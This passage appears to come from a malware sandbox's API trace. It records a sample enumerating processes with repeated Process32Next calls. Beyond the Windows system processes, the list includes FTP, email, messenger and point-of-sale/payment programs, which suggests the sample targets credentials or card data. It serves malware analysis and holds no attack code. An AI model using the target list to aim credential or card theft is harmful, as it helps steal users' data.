szExeFile="svchost.exe")) returned 1 [0252.577] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.579] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.580] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0252.582] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.584] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0252.585] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.587] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0252.588] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0252.590] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0252.591] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0252.593] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0252.595] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0252.596] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.598] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.599] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0252.643] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0252.645] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.647] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.649] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.651] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.652] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0252.654] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0252.656] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0252.658] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0252.660] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0252.662] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0252.663] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0252.665] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0252.666] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0252.669] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0252.693] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0252.694] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0252.696] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0252.698] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0252.760] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0252.762] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0252.764] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0252.765] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0252.767] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0252.769] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0252.771] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0252.773] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0252.775] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0252.777] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0252.779] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0252.781] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0252.783] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0252.785] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0252.788] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0252.790] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0252.793] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0252.795] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0252.843] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0252.846] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0252.850] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0252.852] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0252.855] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0252.858] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0252.861] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0252.864] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0252.866] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0252.869] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0252.872] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0252.875] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0252.877] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0252.924] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0252.927] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0252.930] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0252.932] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0252.935] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0252.938] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0252.940] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0252.942] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0252.945] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0252.948] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0252.950] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0252.952] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0252.954] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0252.957] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0252.977] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0252.981] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0252.983] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0252.986] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0252.989] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0252.992] Process32Next (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, 